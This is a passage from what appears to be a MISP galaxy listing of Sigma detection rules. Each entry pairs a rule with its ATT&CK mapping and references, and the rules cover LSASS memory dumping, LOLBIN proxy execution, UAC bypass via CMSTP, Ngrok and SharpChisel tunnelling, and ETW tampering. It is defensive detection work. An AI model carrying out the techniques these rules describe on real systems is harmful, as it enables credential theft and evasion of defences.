Dumping Process via Sqldumper.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10080. Table References

Links

https://twitter.com/countuponsec/status/910969424215232518

https://twitter.com/countuponsec/status/910977826853068800

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml

Use Icacls to Hide File to Everyone

Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files

The tag is: misp-galaxy:sigma-rules="Use Icacls to Hide File to Everyone"

Use Icacls to Hide File to Everyone has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"

Table 10081. Table References

Links

https://app.any.run/tasks/1df999e6-1cb8-45e3-8b61-499d1b7d5a9b/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_icacls_deny.yml

Obfuscated IP Via CLI

Detects usage of an encoded/obfuscated version of an IP address (hex, octal, etc.) via command line

The tag is: misp-galaxy:sigma-rules="Obfuscated IP Via CLI"

Table 10082. Table References

Links

https://twitter.com/Yasser_Elsnbary/status/1553804135354564608

https://h.43z.one/ipconverter/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_obfuscated_ip_via_cli.yml

Query Usage To Exfil Data

Detects usage of "query.exe" a system binary to exfil information such as "sessions" and "processes" for later use

The tag is: misp-galaxy:sigma-rules="Query Usage To Exfil Data"

Table 10083. Table References

Links

https://twitter.com/MichalKoczwara/status/1553634816016498688

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_query_session_exfil.yml

Wusa.EXE Extracting Cab Files From Suspicious Paths

Detects usage of the "wusa.exe" (Windows Update Standalone Installer) utility to extract cab using the "/extract" argument from suspicious paths

The tag is: misp-galaxy:sigma-rules="Wusa.EXE Extracting Cab Files From Suspicious Paths"

Table 10084. Table References

Links

https://www.echotrail.io/insights/search/wusa.exe/

https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml

SyncAppvPublishingServer Execute Arbitrary PowerShell Code

Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.

The tag is: misp-galaxy:sigma-rules="SyncAppvPublishingServer Execute Arbitrary PowerShell Code"

SyncAppvPublishingServer Execute Arbitrary PowerShell Code has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10085. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml

Stop Windows Service Via Sc.EXE

Detects the stopping of a Windows service via the "sc.exe" utility

The tag is: misp-galaxy:sigma-rules="Stop Windows Service Via Sc.EXE"

Stop Windows Service Via Sc.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"

Table 10086. Table References

Links

https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc742107(v=ws.11)

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_stop_service.yml

Use of Wfc.exe

The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft’s recommended block rules.

The tag is: misp-galaxy:sigma-rules="Use of Wfc.exe"

Use of Wfc.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Trusted Developer Utilities Proxy Execution - T1127" with estimative-language:likelihood-probability="almost-certain"

Table 10087. Table References

Links

https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wfc/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_wfc.yml

Suspicious SysAidServer Child

Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)

The tag is: misp-galaxy:sigma-rules="Suspicious SysAidServer Child"

Suspicious SysAidServer Child has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"

Table 10088. Table References

Links

https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_java_sysaidserver_susp_child_process.yml

Whoami.EXE Execution Anomaly

Detects the execution of whoami.exe with suspicious parent processes.

The tag is: misp-galaxy:sigma-rules="Whoami.EXE Execution Anomaly"

Whoami.EXE Execution Anomaly has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 10089. Table References

Links

https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/

https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/

https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_parent_anomaly.yml

HackTool - SharpChisel Execution

Detects usage of the Sharp Chisel via the commandline arguments

The tag is: misp-galaxy:sigma-rules="HackTool - SharpChisel Execution"

HackTool - SharpChisel Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"

Table 10090. Table References

Links

https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/

https://github.com/shantanu561993/SharpChisel

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharp_chisel.yml

Suspicious GUP Usage

Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks

The tag is: misp-galaxy:sigma-rules="Suspicious GUP Usage"

Suspicious GUP Usage has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 10091. Table References

Links

https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gup_suspicious_execution.yml

PUA - Ngrok Execution

Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available. Involved domains are bin.equinox.io for download and *.ngrok.io for connections.

The tag is: misp-galaxy:sigma-rules="PUA - Ngrok Execution"

PUA - Ngrok Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572" with estimative-language:likelihood-probability="almost-certain"

Table 10093. Table References

Links

https://cybleinc.com/2021/02/15/ngrok-platform-abused-by-hackers-to-deliver-a-new-wave-of-phishing-attacks/

https://ngrok.com/docs

https://twitter.com/xorJosh/status/1598646907802451969

https://www.softwaretestinghelp.com/how-to-use-ngrok/

https://stackoverflow.com/questions/42442320/ssh-tunnel-to-ngrok-and-initiate-rdp

https://www.virustotal.com/gui/file/58d21840d915aaf4040ceb89522396124c82f325282f805d1085527e1e2ccfa1/detection

https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_ngrok.yml

Gpscript Execution

Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy

The tag is: misp-galaxy:sigma-rules="Gpscript Execution"

Gpscript Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10094. Table References

Links

https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/

https://lolbas-project.github.io/lolbas/Binaries/Gpscript/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml

Phishing Pattern ISO in Archive

Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)

The tag is: misp-galaxy:sigma-rules="Phishing Pattern ISO in Archive"

Phishing Pattern ISO in Archive has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Phishing - T1566" with estimative-language:likelihood-probability="almost-certain"

Table 10095. Table References

Links

https://twitter.com/1ZRR4H/status/1534259727059787783

https://app.any.run/tasks/e1fe6a62-bce8-4323-a49a-63795d9afd5d/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_archiver_iso_phishing.yml

CMSTP UAC Bypass via COM Object Access

Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)

The tag is: misp-galaxy:sigma-rules="CMSTP UAC Bypass via COM Object Access"

CMSTP UAC Bypass via COM Object Access has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="CMSTP - T1218.003" with estimative-language:likelihood-probability="almost-certain"

Table 10097. Table References

Links

https://github.com/hfiref0x/UACME

https://twitter.com/hFireF0X/status/897640081053364225

https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/

https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp_com_object_access.yml

CMSTP Execution Process Creation

Detects various indicators of Microsoft Connection Manager Profile Installer execution

The tag is: misp-galaxy:sigma-rules="CMSTP Execution Process Creation"

CMSTP Execution Process Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="CMSTP - T1218.003" with estimative-language:likelihood-probability="almost-certain"

Table 10098. Table References

Links

https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmstp_execution_by_creation.yml

Arbitrary Command Execution Using WSL

Detects potential abuse of Windows Subsystem for Linux (WSL) binary as a LOLBIN to execute arbitrary Linux or Windows commands

The tag is: misp-galaxy:sigma-rules="Arbitrary Command Execution Using WSL"

Arbitrary Command Execution Using WSL has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10099. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/

https://twitter.com/nas_bench/status/1535431474429808642

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wsl_lolbin_execution.yml

Malicious Base64 Encoded PowerShell Keywords in Command Lines

Detects base64 encoded strings used in hidden malicious PowerShell command lines

The tag is: misp-galaxy:sigma-rules="Malicious Base64 Encoded PowerShell Keywords in Command Lines"

Malicious Base64 Encoded PowerShell Keywords in Command Lines has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10100. Table References

Links

http://www.leeholmes.com/blog/2017/09/21/searching-for-content-in-base-64-strings/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_hidden_flag.yml

Potential Product Reconnaissance Via Wmic.EXE

Detects the execution of WMIC in order to get a list of firewall and antivirus products

The tag is: misp-galaxy:sigma-rules="Potential Product Reconnaissance Via Wmic.EXE"

Potential Product Reconnaissance Via Wmic.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 10101. Table References

Links

https://thedfirreport.com/2023/03/06/2022-year-in-review/

https://www.yeahhub.com/list-installed-programs-version-path-windows/

https://learn.microsoft.com/en-us/answers/questions/253555/software-list-inventory-wmic-product

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_product.yml

Suspicious XOR Encoded PowerShell Command

Detects presence of a potentially xor encoded powershell command

The tag is: misp-galaxy:sigma-rules="Suspicious XOR Encoded PowerShell Command"

Suspicious XOR Encoded PowerShell Command has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 10102. Table References

Links

https://redcanary.com/blog/yellow-cockatoo/

https://mez0.cc/posts/cobaltstrike-powershell-exec/

https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65

https://zero2auto.com/2020/05/19/netwalker-re/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_xor_commandline.yml

Remote PowerShell Session Host Process (WinRM)

Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).

The tag is: misp-galaxy:sigma-rules="Remote PowerShell Session Host Process (WinRM)"

Remote PowerShell Session Host Process (WinRM) has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Remote Management - T1021.006" with estimative-language:likelihood-probability="almost-certain"

Table 10104. Table References

Links

https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winrm_remote_powershell_session_process.yml

HackTool - XORDump Execution

Detects suspicious use of XORDump process memory dumping utility

The tag is: misp-galaxy:sigma-rules="HackTool - XORDump Execution"

HackTool - XORDump Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10105. Table References

Links

https://github.com/audibleblink/xordump

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_xordump.yml

PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE

Detects active directory enumeration activity using known AdFind CLI flags

The tag is: misp-galaxy:sigma-rules="PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE"

PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"

Table 10106. Table References

Links

https://www.joeware.net/freetools/tools/adfind/

https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.002/T1087.002.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_adfind_enumeration.yml

PDQ Deploy Remote Adminstartion Tool Execution

Detect use of PDQ Deploy remote admin tool

The tag is: misp-galaxy:sigma-rules="PDQ Deploy Remote Adminstartion Tool Execution"

PDQ Deploy Remote Adminstartion Tool Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Software Deployment Tools - T1072" with estimative-language:likelihood-probability="almost-certain"

Table 10107. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1072/T1072.md

https://www.pdq.com/pdq-deploy/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pdqdeploy_execution.yml

Proxy Execution Via Wuauclt.EXE

Detects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution.

The tag is: misp-galaxy:sigma-rules="Proxy Execution Via Wuauclt.EXE"

Proxy Execution Via Wuauclt.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10108. Table References

Links

https://dtm.uk/wuauclt/

https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wuauclt_dll_loading.yml

WMI Persistence - Script Event Consumer

Detects WMI script event consumers

The tag is: misp-galaxy:sigma-rules="WMI Persistence - Script Event Consumer"

WMI Persistence - Script Event Consumer has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003" with estimative-language:likelihood-probability="almost-certain"

Table 10109. Table References

Links

https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml

Execute Code with Pester.bat

Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)

The tag is: misp-galaxy:sigma-rules="Execute Code with Pester.bat"

Execute Code with Pester.bat has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Script Proxy Execution - T1216" with estimative-language:likelihood-probability="almost-certain"

Table 10110. Table References

Links

https://twitter.com/Oddvarmoe/status/993383596244258816

https://github.com/api0cradle/LOLBAS/blob/d148d278f5f205ce67cfaf49afdfb68071c7252a/OSScripts/pester.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pester_1.yml

Potential Mftrace.EXE Abuse

Detects child processes of the "Trace log generation tool for Media Foundation Tools" (Mftrace.exe) which can abused to execute arbitrary binaries.

The tag is: misp-galaxy:sigma-rules="Potential Mftrace.EXE Abuse"

Potential Mftrace.EXE Abuse has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Trusted Developer Utilities Proxy Execution - T1127" with estimative-language:likelihood-probability="almost-certain"

Table 10111. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mftrace/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mftrace_child_process.yml

Potential Command Line Path Traversal Evasion Attempt

Detects potential evasion or obfuscation attempts using bogus path traversal via the commandline

The tag is: misp-galaxy:sigma-rules="Potential Command Line Path Traversal Evasion Attempt"

Potential Command Line Path Traversal Evasion Attempt has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 10112. Table References

Links

https://twitter.com/Gal_B1t/status/1062971006078345217

https://twitter.com/hexacorn/status/1448037865435320323

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_commandline_path_traversal_evasion.yml

Regsvr32 Execution From Highly Suspicious Location

Detects execution of regsvr32 where the DLL is located in a highly suspicious locations

The tag is: misp-galaxy:sigma-rules="Regsvr32 Execution From Highly Suspicious Location"

Regsvr32 Execution From Highly Suspicious Location has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"

Table 10113. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_2.yml

Chromium Browser Instance Executed With Custom Extension

Detects a Chromium based browser process with the 'load-extension' flag to start a instance with a custom extension

The tag is: misp-galaxy:sigma-rules="Chromium Browser Instance Executed With Custom Extension"

Chromium Browser Instance Executed With Custom Extension has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Browser Extensions - T1176" with estimative-language:likelihood-probability="almost-certain"

Table 10114. Table References

Links

https://emkc.org/s/RJjuLa

https://redcanary.com/blog/chromeloader/

https://www.mandiant.com/resources/blog/lnk-between-browsers

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_chromium_load_extension.yml

Browser Execution In Headless Mode

Detects execution of Chromium based browser in headless mode

The tag is: misp-galaxy:sigma-rules="Browser Execution In Headless Mode"

Browser Execution In Headless Mode has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 10115. Table References

Links

https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html

https://twitter.com/mrd0x/status/1478234484881436672?s=12

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_exec.yml

Potentially Suspicious Child Process Of WinRAR.EXE

Detects potentially suspicious child processes of WinRAR.exe.

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Child Process Of WinRAR.EXE"

Potentially Suspicious Child Process Of WinRAR.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"

Table 10116. Table References

Links

https://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831/blob/26ab6c40b6d2c09bb4fc60feaa4a3a90cfd20c23/Part-1-Overview.md

https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winrar_susp_child_process.yml

Taskmgr as LOCAL_SYSTEM

Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM

The tag is: misp-galaxy:sigma-rules="Taskmgr as LOCAL_SYSTEM"

Taskmgr as LOCAL_SYSTEM has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 10117. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_taskmgr_localsystem.yml

Suspicious Execution Of PDQDeployRunner

Detects suspicious execution of "PDQDeployRunner" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines

The tag is: misp-galaxy:sigma-rules="Suspicious Execution Of PDQDeployRunner"

Table 10118. Table References

Links

https://twitter.com/malmoeb/status/1550483085472432128

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml

ETW Logging Tamper In .NET Processes

Detects changes to environment variables related to ETW logging. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.

The tag is: misp-galaxy:sigma-rules="ETW Logging Tamper In .NET Processes"

ETW Logging Tamper In .NET Processes has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"

Table 10119. Table References

Links

https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables

https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf

https://twitter.com/xpn/status/1268712093928378368

https://bunnyinside.com/?term=f71e8cb9c76a

http://managed670.rssing.com/chan-5590147/all_p1.html

https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr

https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38

https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code

https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39

https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_etw_modification_cmdline.yml

Security Tools Keyword Lookup Via Findstr.EXE

Detects execution of "findstr" to search for common names of security tools. Attackers often pipe the results of recon commands such as "tasklist" or "whoami" to "findstr" in order to filter out the results. This detection focuses on the keywords that the attacker might use as a filter.

The tag is: misp-galaxy:sigma-rules="Security Tools Keyword Lookup Via Findstr.EXE"

Security Tools Keyword Lookup Via Findstr.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"

Table 10120. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/987e3ca988ae3cff4b9f6e388c139c05bf44bbb8/atomics/T1518.001/T1518.001.md#atomic-test-1---security-software-discovery

https://www.hhs.gov/sites/default/files/manage-engine-vulnerability-sector-alert-tlpclear.pdf

https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup.yml

Suspicious Sigverif Execution

Detects the execution of sigverif binary as a parent process which could indicate it being used as a LOLBIN to proxy execution

The tag is: misp-galaxy:sigma-rules="Suspicious Sigverif Execution"

Suspicious Sigverif Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Script Proxy Execution - T1216" with estimative-language:likelihood-probability="almost-certain"

Table 10121. Table References

Links

https://twitter.com/0gtweet/status/1457676633809330184

https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_sigverif.yml

Suspicious Schtasks Schedule Types

Detects scheduled task creations or modification on a suspicious schedule type

The tag is: misp-galaxy:sigma-rules="Suspicious Schtasks Schedule Types"

Suspicious Schtasks Schedule Types has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 10122. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create

http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_schedule_type.yml

ConvertTo-SecureString Cmdlet Usage Via CommandLine

Detects usage of the "ConvertTo-SecureString" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity

The tag is: misp-galaxy:sigma-rules="ConvertTo-SecureString Cmdlet Usage Via CommandLine"

ConvertTo-SecureString Cmdlet Usage Via CommandLine has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10123. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65

https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/convertto-securestring?view=powershell-7.3#examples

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_convertto_securestring.yml

Sysinternals PsSuspend Execution

Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes

The tag is: misp-galaxy:sigma-rules="Sysinternals PsSuspend Execution"

Sysinternals PsSuspend Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 10124. Table References

Links

https://learn.microsoft.com/en-us/sysinternals/downloads/pssuspend

https://twitter.com/0gtweet/status/1638069413717975046

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_pssuspend_execution.yml

Uncommon Child Process Of AddinUtil.EXE

Detects uncommon child processes of the Add-In deployment cache updating utility (AddInutil.exe) which could be a sign of potential abuse of the binary to proxy execution via a custom Addins.Store payload.

The tag is: misp-galaxy:sigma-rules="Uncommon Child Process Of AddinUtil.EXE"

Uncommon Child Process Of AddinUtil.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10125. Table References

Links

https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_addinutil_uncommon_child_process.yml

Suspicious Diantz Download and Compress Into a CAB File

Download and compress a remote file and store it in a cab file on local machine.

The tag is: misp-galaxy:sigma-rules="Suspicious Diantz Download and Compress Into a CAB File"

Suspicious Diantz Download and Compress Into a CAB File has relationships with:

